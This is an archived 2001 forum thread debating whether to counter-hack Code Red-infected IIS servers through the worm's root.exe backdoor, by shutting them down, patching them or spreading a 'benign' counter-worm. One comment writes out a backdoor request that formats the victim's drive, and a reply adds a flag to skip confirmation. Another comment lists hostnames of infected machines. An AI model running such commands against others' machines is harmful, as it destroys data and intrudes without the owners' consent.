I'm not happy about the current situation. (And no, finding a different provider doesn't solve the problem either, all of them have it to some extent.)

[ Parent ]

dont look for them, wait for them to look for you (none / 0) (#67)
by Ricdude on Wed Aug 08, 2001 at 02:51:01 PM EST

Add a cron job that checks your access_log (or equivalent) for infection attempts, and use that as your list of target machines to "vaccinate". No additional waste of bandwidth in that technique.

Someone could even post the instructions on how to set up a "clinic" on a webserver (i.e. the necessary default.ida and supporting scripts) for others to use. The writer shouldn't be liable for any uses, any more than someone who finds a root exploit in a program is liable for damages due to that exploit.


[ Parent ]
Uh.. (none / 0) (#89)
by Inoshiro on Wed Aug 08, 2001 at 06:36:25 PM EST

That's what I did, when I wrote it in my diary. That's what inpsired the neuneu2k guy to write a story. My "fix" hooks into default.ida requests in Apache and turns around and tries to shutdown the remote machine.

But don't feel too bad. More people than you felt the need to post without bothering to read the article as well as the supporting material linked.



--
[ イノシロ ]
[ Parent ]
*smack* duh... (none / 0) (#104)
by Ricdude on Wed Aug 08, 2001 at 10:33:16 PM EST

Sorry, I was on the wrong wavelength when I started the reply. Knee deep in a recompile at work, not the best place for design work. =) Call it a design defect. The proposed solutions are pretty cool. Not to mention that handy root.exe that's left around; I bet you could do a lot of useful things with that...

[ Parent ]
Hehe (none / 0) (#120)
by Inoshiro on Thu Aug 09, 2001 at 02:09:28 PM EST

"The proposed solutions are pretty cool. Not to mention that handy root.exe that's left around; I bet you could do a lot of useful things with that..."

Which is why this was posted, so smart people like you could come up with solutions and post them :)



--
[ イノシロ ]
[ Parent ]
Code Blue? (3.57 / 7) (#21)
by apocryphile on Wed Aug 08, 2001 at 09:52:50 AM EST

I like this idea. I don't have the skills to participate, but I do have a suggestion to take it a little further.

Would it be feasible to make a script for Win2K systems that watches for Code Red connection attempts, does the things listed above to the offending server, and then copies itself to the offending server?

"If a little knowledge is a dangerous thing, I may just be the deadliest man alive."
Apocryphile

Nope (3.00 / 2) (#23)
by neuneu2K on Wed Aug 08, 2001 at 10:15:59 AM EST

Well, it is feasible of course...
but I do not think that I would go as far as "infecting" a machine , even for good.

And if a good script is written, if only a handfull of servers host it, it would be sufficient to reduce greatly the propagation of code red and the danger of having "remotely administable" machines hanging around by thousands !

I really like the name - code blue - !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Re: Code Blue (4.00 / 2) (#31)
by apocryphile on Wed Aug 08, 2001 at 11:00:29 AM EST

I understand your reluctance to spread any sort of infection to other computers, but I think that there are some good arguments for this (yeah, maybe I should have put these in my first comment).
  • Ideally, you write the script so that it allows no further connections or administration from the outside world. It still attempts to alert the owner of the box, and you can add instructions on how to remove this script (heck, you can include a script that will remove itself and this script when run). This should somewhat ameliorate the concerns about infecting someone elses's machine. The machine was already infected, you're just replacing a malign infection with a benign one, and giving them the method to remove the infection altogether.
  • Someone else is going to think of this for less benign purposes. If someone does the same thing, but leaves themselves a back door, they will soon own almost all the Code Red machines out there. Why is this so bad? There is a good chance no one is going to notice the counter infection, since it will only affect people who are already infected with Code Red, and thus probably aren't paying attention anyway, or have some nasty agenda of their own. The only sign to everyone else would the that the number of Code Red attacks would drop off. If they wanted to avoid even this, they could just leave the normal Code Red in place.
These may not be sufficient arguments. I certainly won't try to convince anyone to do this if they thinks it's wrong. I just shudder at the thought of the havok someone could wreak using the huge number of Code Red infected servers out there. I also don't think that you'll get enough people running the non-infectious script to have a siginificant impact on the number of infected servers.

---If a little knowledge is a dangerous thing, I may be the deadliest man alive.
------Apocryphile

[ Parent ]

I understaind your reasons... (2.00 / 1) (#36)
by neuneu2K on Wed Aug 08, 2001 at 11:16:27 AM EST

But, patching without the knowledge and agreement of the owner is illegal. I am ready to break the law to "repair".
I am not ready to make opther people unknowingly break the law by spreading my patch.

But, I agree, if it really "added value" to code blue, I would do It. A simple script seems enough to me to stop Code Red so I will stop there.
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Pragmatism (4.00 / 1) (#41)
by apocryphile on Wed Aug 08, 2001 at 11:37:05 AM EST

I guess I lean more toward pragmatism. How about this as a compromise.

Drop the script, and instructions for running it (along with a warning of the possible legal ramifications) on the machine, but don't run it. Sure, it wouldn't be wise of them to run a script received anonymously, but what do you want to bet that lots will? Ideally, you include a well commented version of the script, so the more technically savvy can verify its operation.

This changes it from an opt-out, to an opt-in, and should address your concerns, while still helping the spread of the countermeasure.

---If a little knowledge is a dangerous thing, I may be the most dangerous man alive.
-----Apocryphile

[ Parent ]

IANAL but (3.00 / 1) (#48)
by kezgin on Wed Aug 08, 2001 at 12:15:58 PM EST

I am not ready to make opther people unknowingly break the law by spreading my patch.

Would other people that unknowingly spread the counter infection be breaking the law? I mean, if that were the case, everyone that helped spread CRI/II, or any virus/worm, would be breaking laws as well.

[ Parent ]
If only we were so lucky. (none / 0) (#83)
by Inoshiro on Wed Aug 08, 2001 at 05:34:39 PM EST

If we had good anti-lemon laws, and laws againts impropely maintained systems (and/or licencing for systems admins on the internet), we would have much better experiences. ISPs would firewall off their subscribers, and the silly net share viruses would not cross polinate ISPs. Secretaries would not be admisitrating the company website. And maybe, just maybe, those lazy-ass people who are responsible for CR1/2 on their real websites (opposed to the CM lusers) would keep up on patches better.

But we aren't so lucky, and we have to fight back. Because I'm mad as hell and not going to take this abuse from stupid admins any more.



--
[ イノシロ ]
[ Parent ]
Real purpose of Code Red (none / 0) (#155)
by mrogers on Thu Aug 16, 2001 at 10:05:57 AM EST

There is a good chance no one is going to notice the counter infection, since it will only affect people who are already infected with Code Red, and thus probably aren't paying attention anyway

This raises the interesting possibility that the real purpose of Code Red was to identify unattended machines, and all the 'Hacked by Chinese' and whitehouse.gov stuff was just a smokescreen. Or is that too close to being a conspiracy theory?;-)

[ Parent ]

Evil related idea (3.00 / 1) (#35)
by dennis on Wed Aug 08, 2001 at 11:11:55 AM EST

How to anonymously root a quarter million machines overnight

Interesting idea though. If someone were to make a CodeRed-eating worm, it would greatly reduce the incidence of CodeRed infection, while not affecting servers that have already been patched. Don't know if it's a good idea, but it's clear that just expecting people to patch their systems isn't fixing the problem, and it's only going to get worse. With two competing worms you get a classic predator-prey ecosystem, instead of one growing exponentially like rabbits in Australia. I wouldn't want to be the test case in court but long-term it might be the only solution.

Of course, if these competing worms start to evolve on their own, we might have a problem....

[ Parent ]

Code Red II survives reboot (4.33 / 12) (#22)
by swiftone on Wed Aug 08, 2001 at 10:09:20 AM EST

Note that Code Red II (see http://www.incidents.org/react/code_redII.php) survives a reboot. Also, rebooting a Code Red I server doesn't patch it, so it will simply get reinfected.

So if one is truly following this article's suggestion to neuter comprimised servers, rebooting is a poor choice.

re: Code Red II survives reboot (4.00 / 1) (#73)
by ignatiusst on Wed Aug 08, 2001 at 04:31:06 PM EST

Thanks for the link to this article! My server was hit Saturday, and even though I have applied the patch, I have still refused to re-connect to the internet until I reformat the hard drive.

My clients have been screaming bloody murder (fortunately, I am not an ISP provider, or I wouldn't have any clients by now - or, I would have them right up until the time a hacker got in through the back door and rooted my server), and my partner has been ready to blow his top. I have tried again and again to explain the whole concept of backdoors, trojans, and the server's vulnerability, but I am either not convincing enough or they are just too damn obtuse. This article spell out everything I have been trying to say for the past three days, except it does it clearly and with (assumedly) greater authority than I can command.

Once again, thanks!

When a true genius appears in the world, you may know him by this sign, that the dunces are all in confederacy against him. -- Jonathan Swift
[ Parent ]

shortage of ethics (3.58 / 12) (#28)
by Speare on Wed Aug 08, 2001 at 10:54:10 AM EST

Why do schools neglect an ethics curriculum?

Your solutions should not affect the state of the infected machines. Even telling them that their machine is infected is over the line, if you're using their machine to do it.

If you're being hampered by Code Red hits, make a script to firewall off every infected computer for a day. Allow those firewalls to expire, and if they're still infected, they'll get blocked again.

    "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin

Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.
 
[ e d @ h a l l e y . c c ]

two points: (3.66 / 6) (#34)
by neuneu2K on Wed Aug 08, 2001 at 11:08:15 AM EST

  • Firewalling their machines would not stop them from being infected, would not stop the packets from spouting,would not stop any DDoS. But I agree, if you do not try to stop them, at least do not respond to them (even with a 404)
  • I am NOT giving away any liberty ! I have not proposed to make having an infected machine illegal. I think that, apart maybe from the author of the worm, nobody has chosen to run the worm !.
    In fact, I am sure that most of the users would be glad to have their machine disinfected.

Preservation of Freedom stops me from doing -harm-, not from preventing harm.

If you love liberty, shouldnt you prefer the Internet to be technically regulated from the base than politically regulated from the top, because if we dont stop this worm and it does damage, it will be a scrapegoat for goverments to regulate the fact of running a server.


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Ethics classes (3.25 / 4) (#44)
by fluffy grue on Wed Aug 08, 2001 at 12:00:49 PM EST

The problem isn't a lack of ethics classes, the problem is the subject matter. All that NMSU CS's ethics class ends up saying is, "There is no privacy anymore, and IP should be free. Oh, and there's too much pornography online."
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

Ethics (3.00 / 1) (#54)
by Abstraction on Wed Aug 08, 2001 at 01:28:50 PM EST

Why do schools neglect an ethics curriculum?

Mine didn't, as I'm sure others didn't also. It's just that the borderline between ethical and not ethical can sometimes be hard to see. That and some people just don't have any ethics to begin with.

[ Parent ]
You're right, of course... (2.00 / 1) (#64)
by darthaggie on Wed Aug 08, 2001 at 02:39:56 PM EST

Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

Agreed. But their ISP should demand they fix it asap, and if it isn't fixed in a reasonable amount of time, disconnect them completely.

Yes, that's rash, but then again leaving known network holes on the 'net is also a violation of liberty.

I am BOFH. Resistance is futile. Your network will be assimilated.
[ Parent ]

The Ethics of Hacking (4.50 / 2) (#109)
by BlckKnght on Thu Aug 09, 2001 at 04:47:39 AM EST

Why do schools neglect an ethics curriculum?
I'm going to rise to this flame bate and stand up for everyone who thinks that there is an ethical justification for this kind of hacking (to repair a previous infection). I doubt I'm the best qualified to give you a rundown on hacker ethics but since no one else has tried to refute your comment I'll do my best.
Your solutions should not affect the state of the infected machines. Even telling them that their machine is infected is over the line, if you're using their machine to do it.
First, may I ask why it is "over the line"? Do you think it is an invasion of privacy? A theft of computer resources? What is the problem? I'll accept that it is probably illegal. I'll take that risk for the good of the internet.

Your quotation of Ben Franklin is totally irrelevant. It might be if the cry was for the government to step in and secure all computers (as was proposed here). It's not. The idea is for you and I, as part of the Society of the internet, to do something about this specific problem.

It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.
Code Red II is not a small problem like the first Code Red. This worm is installing a backdoor on hundreds of thousands of machines. These compromised machines, even after they stop scanning, can be used later by malicious persons to do a wide variety of things (DDoS is an obvious application).

Furthermore, it's hard (perhaps impossible) for the admin of a compromised system to know that this has not already happened! Until they reformat their drive and reinstall everything, they are a risk to everyone else online (this is infact the recomendation in the report here).

I'll go out on a limb and say that I think it would be ethical, though in extremely poor taste (and legal judgement), to respond by doing the reformatting yourself, via the backdoor. Far better yet would be to disable the backdoor as best you can and notify the admin. If that is also too invasive for you, still try notify the admin through whatever channels you can. Don't do nothing, just to respect the "rights" of the infected host.

There are some times where it is ethical to ignore the "rights" of individuals (and some are actually legal too). The actions proposed in this story are not violations of the rights of the owners of infected web servers. Those people are a danger to the people of the internet, just as much as a person shouting fire in a theater is a danger to those arround him. As important as they are, individual's rights should not prevent society from doing the Right Thing.

-- 
Error: .signature: No such file or directory


[ Parent ]
Using their machine (3.00 / 1) (#112)
by Elendur on Thu Aug 09, 2001 at 06:11:14 AM EST

"Even telling them that their machine is infected is over the line, if you're using their machine to do it. "

Yes, you're using their machine to do that, but consider what that really means. If I send them an email I am using their machine when they read it. If I have a win2k box on the same network and do a net send, it uses their machine. Any interaction at all between two computers uses both systems even though it only requires one to initiate it. Connecting to their box with a script and doing a net send to tell them that they're infected is no worse than any of these perfectly legitimate ways of using their machine.

[ Parent ]
Format the damn things. (1.50 / 14) (#29)
by stormie on Wed Aug 08, 2001 at 10:57:15 AM EST

* should NOT format the drive of the poor S.O.B. or otherwise destroy important data

Why the hell not? These machines breed out of control and consume the bandwidth that other people are paying for. Formatting them is like shooting a feral rabbit or something. Sure, there's a legal risk here, but if you get probed by a Code Red infected server in Taiwan or somewhere, I'm all for a "GET /scripts/root.exe?/c+format+/u+c:" or whatever it takes to put them out of our misery.



left off one (4.50 / 2) (#55)
by h2odragon on Wed Aug 08, 2001 at 01:31:21 PM EST

"/autotest"... It wouldn't do to have the thing hang up asking for verification....

[ Parent ]
You are a fucking asshole (5.00 / 3) (#81)
by delmoi on Wed Aug 08, 2001 at 05:00:02 PM EST

Yeh, if someone gets their machine hacked and cause you a minor annoyance they definetly deserve to have anything and everything on their computer destroyed. I mean, fuck, mp3s, their own writing and pictures. years of email. No data could possibly be worth those hundreds of extra log entries on your machine!
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
More harm then good. (3.50 / 2) (#56)
by PlutoniumHigh on Wed Aug 08, 2001 at 01:33:27 PM EST

All this does is promote lazyness. Im sure that there are more then enough admins that use IIS that have been infected by these types of exploits several times over. If a business finds that their website has been down 1/2 of the time because the admin dosen't know how to apply a security patch, he/she would probably be repremanded or fired.

If a script fixes the problem for them, what good does it do in the long run? The business knows no different and does not realise that their admin may be a moron. The admin will not learn from their mistakes. More importantly, people will not realize that the software they use may be substandard.

I prefer not to use IIS, but there are a few occasions when I have to. It is not that hard to prevent these types of infections. People (as well as the software makers) all have to learn how to prevent it. Sometimes, to prevent mistakes, you first must fall flat on you face.

not all IIS users are admin ! (3.00 / 1) (#57)
by neuneu2K on Wed Aug 08, 2001 at 01:36:45 PM EST

Professional use of IIS is not the problem here, most of the times, if there is an admin, servers will be patched !

The owned machines are mostly cable or DSL guys who installed Win2k server (because that is the warezd version they found)
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Re:not all IIS users are admin ! (none / 0) (#59)
by PlutoniumHigh on Wed Aug 08, 2001 at 01:54:16 PM EST

I agree. Most admins do their job. Most infections are probably Cable/DSL. I don't know for sure, but I'll take your word for it. (if you have a refrence for this, i'd like to see it out of curiosity :) )

Even so, its education and awareness for the user. If someone gets booted off their ISP for excessive traffic because they were running an infected 2000 server; I say too bad for them. Thats how people learn the most, by those types of failures. Chances are, they won't run 2000 server again or they will be more willing and curious to learn about servers and security in general. These types of "white hat" scripts may fix an exploit, but they do not really solve the problem.


[ Parent ]
I've got a cable modem (none / 0) (#61)
by weirdling on Wed Aug 08, 2001 at 02:12:37 PM EST

Those idiotic machines are trying to hack my Mac. My cable modem is railed most of the time with worm-related traffic from the luser win machines.

I'm not doing this again; last time no one believed it.
[ Parent ]
The servers I've gotten Code Red 1 and 2 hits from (none / 0) (#65)
by fluffy grue on Wed Aug 08, 2001 at 02:41:14 PM EST

Ignoring the few dozen which have no PTR responses (about half of which are on 128.x.x.x addresses and are therefore at a university, and are probably unsecured workstations), I got hits from the following hosts:

lsanca1-ar11-051-165.lsanca1.dsl.gtei.net
c998455-a.plstn1.sfba.home.com
modemcable024.131-203-24.que.mc.videotron.ca
user-24-214-44-5.knology.net
user-24-214-72-23.knology.net
cr982552-a.ym1.on.wave.home.com
cx252934-a.chnd1.az.home.com
framed-user-249.62.151.65.ya.com
L1508P26.dipool.highway.telekom.at
cblmdm63-166-32-177.buckeye-express.com
1Cust218.tnt1.nashua.nh.da.uu.net
ip-63-250-46-253.nas.dsl.fcc.net
1Cust51.tnt1.las-cruces.nm.da.uu.net
nldc2-175.inav.net
adsl-81-198-127.jax.bellsouth.net
bozeman-66.109.133.23.bzn.montana.com
user-112uotd.biz.mindspring.com
voicemedicaldata.com
pc-marbock.NMSU.Edu
pc-socwork26.NMSU.Edu
pc-biscuit.nmsu.edu
rmcsdev.usc.edu
dial164.CC.Lehigh.EDU
DSP2.CC.CMU.EDU
dhcp-227-68.gsm.uci.edu
ants.poly.edu
host2d92.alcatel.com
ev-245-7.Berkeley.EDU
hybel156.grm.hia.no
d8hs4601.seas.columbia.edu
oboeguy.ieor.columbia.edu
chem-240.umd.edu
wizard.ee.ucla.edu
db155.csie.ncku.edu.tw
cdc3.cyberia.net.lb
4-230.corp.sonera-xs.nl
cafe-server.bbt.ufv.br
200-184-153-2.pib.com.br
ciclope.icomex.com.br
win95.vipbbs.com
adsl-204-1-124-138.indi.se.verio.net
dialup210.alliancelink.com
treed-pc1.customer.jump.net
info.tokuko.co.jp
211-232-179-194.panworldnet.com
216-21-141-185.ip.van.radiant.net
bn03655b33wj.bc.hsia.telus.net
DeForestSD-210.nat.wiscnet.net

Notice how most of these are either dialup/user connections or are workstations at educational institutions. The only "real" server I see on that list is voicemedicaldata.com, and that server is currently unresponsive.
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

almost all are home users (4.00 / 1) (#70)
by Garc on Wed Aug 08, 2001 at 03:37:32 PM EST

I have a longer list of machines that have tried to infect my linux box (probably around 1000), and maybe 3 of them aren't on dsl, cable modem or edu.

See for yourself.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

almost all are home users (none / 0) (#149)
by ncc74656 on Sat Aug 11, 2001 at 08:05:10 PM EST

Of 1515 hosts to date, only 195 are explicitly identified as other hosts on lvcm.com (this doesn't count those who have other domain names for their systems that no longer show up as cmxxx.yyy.234.24.lvcm.com in my logs). Of 4021 attacks, though, those 195 hosts account for 2315 attacks.

An up-to-the-second listing of attacks I've fielded is here.

(lvcm.com, BTW, is Cox Express in Las Vegas, the cable-modem provider I use.)

[ Parent ]

this will not work (1.50 / 2) (#58)
by trevize talker on Wed Aug 08, 2001 at 01:38:22 PM EST

view the computer as a portal/terminal to a distributed computing landscapes. then a worm can be hunted and destroyed effectively.

This is such a bad idea... (3.00 / 6) (#62)
by yosemite on Wed Aug 08, 2001 at 02:27:20 PM EST

Imagine the following scenario:
  • The server for some $BIGMONEY site is infected (say, a site that does $BIGNUM dollars worth of business every day).
  • The virus on that server contacts your machine.
  • Your "retalatory strike" is invoked, and modifies the $BIGMONEY system -- congradulations! You've modified a system you don't own without permission!
  • Uh-oh: the ecommerce software running on the $BIGMONEY servers is incompatable with Microsoft's patch (remember "DOS ain't done 'till Lotus don't run"?)
  • The $BIGMONEY lawyers track you down and sue you for damages (lost income, damage to reputation, court costs, etc).
  • Your reputation as a programmer is ruined, you lose everything you own, and you spend a few years in the gray-bar hotel.
Even if all you ever touch is home systems hooked up to cable and DSL, you're still asking for trouble. Most people (even among nominally computer literates) only have the vaguest notion of what Code Red is, and no idea what distinguishes Code Red from SirCam from a DDoS attack. And they're not going to see much difference between a "retaliation" and the original infection.

--
[Signature redacted]

Who are you kidding? (1.00 / 1) (#68)
by impto on Wed Aug 08, 2001 at 02:57:12 PM EST

First of all in the unlikely event that your "$BIGMONEY" scheme were to play out it has already been pointed out that the person who sent the cleaning script wasn't the one who initiated the action that the server requested a file and got it. That the file is a script that would prevent them from using up mass amounts of bandwidth and patch their server to take out backdoors set up in the system is beside the point.

Secondly, if the person/corporations involved are not capable of keeping their server software up to date and are completely clueless as to the existence of these exploits. Then, it is just as likely that they would not be able to attribute an incompatibility of an MS patch with a 5kb script that they also had no idea they were running. (Why you believe these people would somehow see the light and download the patch in the first place is beyond me.)

I guess what I'm getting at is that if the didn't know they were infected they would probably never figure out that they got immunized. And if they did, they would probably not have the knowledge/gumption/know-how to track down who did the disinfecting.

impto

[ Parent ]

Re: Who are you kidding? (none / 0) (#69)
by yosemite on Wed Aug 08, 2001 at 03:32:11 PM EST

it has already been pointed out that the person who sent the cleaning script wasn't the one who initiated the action that the server requested a file and got it.
Oh, come on. How does this even matter? Knowing of a rooted server does not give you the right to administrate it.
if the didn't know they were infected they would probably never figure out that they got immunized. And if they did, they would probably not have the knowledge/gumption/know-how to track down who did the disinfecting.
If something is wrong, having the opinion that you're unlikely to be caught doesn't make it less wrong (I realize this isn't a popular believe these days, but frankly I don't want to live in a world where anything is OK as long as you don't get caught).

Also, there's nothing like having your machine 0w3ned to light a fire under your butt. Even Metallica (or rather, the people their lawyers hired) could trace down Napster users downloading their songs when they decided they wanted to.



--
[Signature redacted]

[ Parent ]

This is why I hate the US. (none / 0) (#75)
by Inoshiro on Wed Aug 08, 2001 at 04:45:06 PM EST

If I were to step in, and shutdown the compromised system -- I'm helping. I'm lessening the exposure time of their compromised system, and I'm ensuring it does not compromise more. And since I'm doing it on demand, rather than using another worm, I'm not just replacing one problem with another.

So why do I go to jail? For the same reason that if I helped a person out a a burning wreck that exploded a few minutes after I got someone to safety, but they happened to end up paralyzed later (be it from the accident, or from what I had to de to got the person out of the wreck before it killed them), they can legally sue me in the US. Thankfully, Canada has good, federal samaritan laws which protect people who intervene in situations like that and save lives. I think some states (Texas) also have them, but it's not universal.

I'm willing to take a stand against CR because it's a pesky annoyance. You might not be, but you're not taking the risk -- are you?



--
[ イノシロ ]
[ Parent ]
Context (4.00 / 1) (#82)
by yosemite on Wed Aug 08, 2001 at 05:29:41 PM EST

Thus spake Inoshiro:
If I were to step in, and shutdown the compromised system -- I'm helping.
If you did it without asking, you'd be a vigilante.

You might claim "self defense", but any action has to be taken in self defense has to be in proportion to the harm threatened.

I'm willing to take a stand against CR because it's a pesky annoyance.
But see, that's my whole point -- CR isn't on the same level as someone trapped in a flaming crash -- it's just a pesky annoyance. And having someone post untested patches to your machine without your permission goes way beyond the level of "a pesky annoyance".

Now, I completely agree that everyone running an infected machine needs to either patch it or take it off the internet ASAP, and by force of law, if necessary. I just think that starting up the Vigilante Hax0rs of Justice is the absolute wrong way to deal with the situation.

--
[Signature redacted]

[ Parent ]

However. (none / 0) (#97)
by static on Wed Aug 08, 2001 at 08:44:08 PM EST

If all the reverse exploit did was shut down the offending server ("net stop iis" or whatever it is) then I could claim all I was doing was no more than stopping their broken machine from hassling mine.

But I can see your point, too. Thinking up an analogy, it would be like turning off your neighbour's TV because he has it way too loud - and won't get himself a hearing aid...

Wade.



[ Parent ]
One little fact ... (none / 0) (#138)
by kostya on Fri Aug 10, 2001 at 01:20:36 PM EST

But I can see your point, too. Thinking up an analogy, it would be like turning off your neighbour's TV because he has it way too loud - and won't get himself a hearing aid...

... without his permission.

Everyone keeps arguing about the severity of the problem, the innocence of the proposed solution--it has nothing to do with any of that. It all comes down to permission or authorization.

Under current U.S. laws and with the current legal climate towards "crackers", to use their machine, in any state of security or exploitation or whatever, without permission is illegal.

Frankly, I think there is good reason. Sure, everyone here thinks there hot stuff, but what if we aren't? Have you worked for a coporate client? There setups can be simple or just plain insane--a simple patch might break some kludge they setup to get IIS to work with their hamster driven tape storage system where they have all their billing. I know I don't want some random joe messing with my home setup.

Drop them an email, give them a phone call, whatever--let them handle it. It's there box. If you want to be a good samaritan, notify them and then offer your services if they don't know what to do.



----
Veritas otium parit. --Terence
[ Parent ]
not exactly (4.00 / 1) (#85)
by rebelcool on Wed Aug 08, 2001 at 06:13:27 PM EST

I found one Source dated 1985 that said 'over 36 states' have good samaritan laws (try looking on google..you'll find tons of different resources but no hard facts. I think you'd be harder pressed to find a state that DIDNT have some kind of good samaritan law.

In every state ive lived in (texas and utah so far) have had the laws.

Some even go so far as to if you DO NOT help a bystander you are guilty of a misdemeanor.

COG. Build your own community. Free, easy, powerful. Demo site
[ Parent ]

Well. (none / 0) (#91)
by Inoshiro on Wed Aug 08, 2001 at 06:48:29 PM EST

We're still taught in driving courses here that we should not attempt to help people if we happen to be in the US -- unless we intend to be outside of the country the next day. Why? Because there is no federal law about helping (like there is here).

Much like a mix of vulnerable and patched machines, a patchwork of saws that does not guarantee saftey just means that other places will teach avoidance to route around the brain damage.



--
[ イノシロ ]
[ Parent ]
different philosophies (none / 0) (#93)
by rebelcool on Wed Aug 08, 2001 at 07:28:19 PM EST

then they are being taught incorrectly, sadly enough.

America has different philosophies about laws. Most things are left up to the states to take care of. Don't let all the big debates which revolve around places where the the federal government has jurisdiction make you think otherwise.

COG. Build your own community. Free, easy, powerful. Demo site
[ Parent ]

Who are YOU kidding? (none / 0) (#72)
by kostya on Wed Aug 08, 2001 at 03:48:50 PM EST

All I have to say is that you are being very, very optimistic. For someone who has worked for large companies and helped high-profile ones shut "the barn door after all the horses are gone", I can say that they will not care one iota if you are the guy who did the original comprimise or the "patch".

If you comprimise their system to patch it, you have comprimised their system. You have broken into their property and modified it without telling them. It's not a good idea, it isn't ethically, and on top of that, it is illegal--intentions or no.

Just because someone doesn't know they are infected doesn't mean they are clueless. Sure, they were sloppy and sure they were lazy--but that doesn't mean they are not able to track you down or hire someone who can. I offer the example of Tsutomu Shimomura--he got owned and then he nailed Mitnick. So even security experts can make mistakes or run stuff in improper ways.

Think about this: by patching the system, you will probably destroy or comprimise any "forensic" data that could be used to track down or verify the original comprimise. That leaves only you, and trust me, they will press you with everything they have--especially if they have lost money.

And, as the poster said, if your patch DOES cause a problem, you are really screwed. This isn't the Wild West anymore. Wake up.



----
Veritas otium parit. --Terence
[ Parent ]
They're criminals too. (none / 0) (#78)
by delmoi on Wed Aug 08, 2001 at 04:54:24 PM EST

Think about this: by patching the system, you will probably destroy or comprimise any "forensic" data that could be used to track down or verify the original comprimise. That leaves only you, and trust me, they will press you with everything they have--especially if they have lost money.

What? The attack would be in the logs just like it is on our machines. Why a 'fix' delete the logs? That is pure hyperboly.

Besides, their machine is 'attacking' your machine, so their breaking the law just as much as you would be.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
I don't know about that ... (none / 0) (#88)
by kostya on Wed Aug 08, 2001 at 06:33:42 PM EST

What? The attack would be in the logs just like it is on our machines. Why a 'fix' delete the logs? That is pure hyperboly.

I said destroy or comprimise, so you probably have a point about hyperbole (the idea that no info would be left is pretty absurd!). My point was that muck around in a system that got comprimised will probably help dirty the evidence even further--leaving them the freshest trail as the strongest. What ever the real case (how much info is left unharmed), it's bad, bad idea.

Besides, their machine is 'attacking' your machine, so their breaking the law just as much as you would be.

Here I would have to disagree with you. A machine that is attacking or harassing another machine due to an exploit the owner doesn't know about is entirely different than the owner of the machine breaking into your machine on purpose. Whatever the intent, breaking into the exploited machine is just illegal. Period.

Now perhaps you could sue the exploited machine's owner for negligence and incompetence, getting back damages on lost bandwidth or time. It would be a tough case, requiring some serious payoff to be worth pursuing. That being said, you suing them for being an idiot versus them suing you for using their machine without permission through illegal means--I think they have a better case.

Is that fair? Eh, it depends on how you look at it. Long story short: this whole "challenge" is a very, very bad idea. As you'll remember, there was a similar worm for the L1on worm that patched the holes. Many people were nonplussed to have that thing mucking about in their system. Even if you document what you did, you are messing with someone else's machine--which isn't legal or ethical.



----
Veritas otium parit. --Terence
[ Parent ]
Interesting..... (none / 0) (#116)
by impto on Thu Aug 09, 2001 at 11:27:43 AM EST

So ignorance is bliss, huh?

So what if I didn't know that I had this script running on my box. What if my Linux distribution just happened to come with this Code Blue script. Would that put me in the same position as the people who have no idea that they have IIS running much less that they've been rooted by Code Red II?

Your argument for who has more right to sue is also interesting. It seems that you think that the retaliating script is using their machine more than they were in the first place. Just because a computer isn't vulnerable doesn't mean that an attack wasn't commited. The retaliating script doesn't create the holes in the system it just uses the holes that the owner allowed, through ignorance or malice, to be created in the first place.

Furthermore the entire world of people who would ever do anything about infected servers has already. It's been on the news, all over the web, and certainly on Microsoft's Update page for a good long while. While altering a system's settings may not be the way to go, I do not think that sending the offender a notice is beyond the scope of ethical.

I am all for a notification of users. Although I don't know how much good it will do considering how obtuse the users who have these machines obviously are. However, you have changed my mind on the issue of fixing the problem.

impto

[ Parent ]

Confused over some points ... (none / 0) (#121)
by kostya on Thu Aug 09, 2001 at 02:36:01 PM EST

(sorry about length, I started and kept going ...)

So what if I didn't know that I had this script running on my box.

You could be accused of negligence. Again, it's not that you can't be held responsible, it's just that if my machine isn't causing you too much trouble (it's sending some CR port 80 attempts) and you hack back into it, I'm going to have a stronger case for harm since you actually violated the law.

In the states, negligence can be prosecuted, so there's a limit on how stupid you could be :-) ... thank God.

What if my Linux distribution just happened to come with this Code Blue script.

That one's easy--sue the distribution maker for negligence when you get sued--i.e. you could claim it wasn't your fault since you bought the product in good faith. Thus the reason for the extensive disclaimers ;-) But even with those, if a distribution didn't show due diligence, they'd have some major restitution to fork out.

Your argument for who has more right to sue is also interesting. It seems that you think that the retaliating script is using their machine more than they were in the first place.

No, that's not the basis of my argument ...

Just because a computer isn't vulnerable doesn't mean that an attack wasn't commited.

This is true, but I'm not sure how this relates to cracking their box (see next) ...

The retaliating script doesn't create the holes in the system it just uses the holes that the owner allowed, through ignorance or malice, to be created in the first place.

Now here we have a very interesting perspective ;-) By this logic, if I haven't been paying attention to the WU-FTP security updates for Red Hat, I lose all rights to keep my box private ... which I don't think you intended ;-)

In terms of legal and not legal, if a company found that you used their machine without their permission, they would base their case on that. It's not how you got in, but what you did--i.e. you used their equipment and resources without their explicit or implicit permission. That's trespassing (or insert some more accurate legal term).

